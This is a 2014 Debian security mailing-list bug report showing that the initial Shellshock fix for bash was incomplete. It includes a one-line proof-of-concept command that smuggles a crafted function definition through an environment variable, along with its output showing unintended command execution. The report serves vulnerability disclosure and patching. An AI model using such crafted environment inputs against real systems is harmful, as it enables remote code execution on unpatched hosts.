[Secure-testing-team] Bug#762760: bash: still vulnerable to environment exploits
brian m. carlson
sandals at crustytoothpaste.net
Wed Sep 24 23:41:44 UTC 2014
Package: bash
Version: 4.2+dfsg-0.1+deb7u1
Severity: critical
Tags: security
As Tavis Ormandy has tweeted[0], the existing patch is not sufficient to
solve the problem:
vauxhall ok % dpkg -l bash | grep ^ii; rm -f echo; env X='() { (a)=>\' bash -c "echo date"; cat echo
ii bash 4.2+dfsg-0.1+deb7u1 amd64 GNU Bourne Again SHell
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Wed Sep 24 23:32:32 UTC 2014
This means all Debian systems are still vulnerable, as bash is an
essential package.
[0] https://twitter.com/taviso/status/514887394294652929
-- System Information:
Debian Release: jessie/sid
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 3.17-rc5-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages bash depends on:
ii base-files 7.5
ii dash 0.5.7-4
ii debianutils 4.4
ii libc6 2.19-11
ii libtinfo5 5.9+20140913-1
Versions of packages bash recommends:
pn bash-completion <none>
Versions of packages bash suggests:
pn bash-doc <none>
-- no debconf information
--
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 819 bytes
Desc: Digital signature
URL: <http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20140924/f72a694f/attachment.sig>
More information about the Secure-testing-team
mailing list